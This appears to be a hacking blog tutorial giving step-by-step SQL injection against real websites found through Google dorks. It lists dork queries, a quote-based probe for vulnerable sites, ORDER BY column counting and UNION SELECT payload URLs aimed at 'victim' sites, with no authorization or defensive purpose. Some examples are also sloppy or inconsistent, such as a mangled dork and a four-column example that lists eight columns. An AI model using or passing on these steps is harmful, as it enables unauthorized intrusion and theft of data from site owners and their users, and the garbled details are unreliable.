Before we see what SQL Injection is. We should know what SQL and Database are. You Can Get this in my previous post here :- link.

Now , Heres the STep by step Guide for " Sql Injection ".

Step 1: Finding Vulnerable Website:

Remmember, Google Uncle is always a Hackers friend. We can find the Vulnerable websites using Dork list. Google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
inurlrofile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id

How to use Google Dork?

Type one of the above command and paste in the Google search box & hit enter.
You will get list of web sites.
You need to check the vulnerability.So Start from the first website.

Step 2: Checking the Vulnerability:

Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes( ' ) at the end of the url and hit enter. (No space between the number and single quotes)

eg:- http://www.abc.com/index.php?id=2'

If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable.
eg:- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:

Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.
p/s:- n are the numbers 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

eg:- http://www.victimsite.com/index.php?id=705 order by 1,2,3,4,,5,6,7,8,9

You get an error like" Unknown Column no.(1,2,3..) in order clause ".
eg :- Unknown Column 9 in order clause

if you get the error while trying the number,then no of column is "x-1"
i.e If you get an error at 9 then the no. is 9-1 = " 8 "
Sometime the above may not work. So, at that time add the "--" at the end of the statement.
For eg: http://www.victimsite.com/index.php?id=705 order by 1,2,3,4,,5,6,7,8,9--


Step 4: Displaying the Vulnerable columns:

Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by " with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).
if the number of columns is 4 ,then the query is as follow: http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7,8--
It will show some numbers in the page whixh is less then the x no. i.e here 8.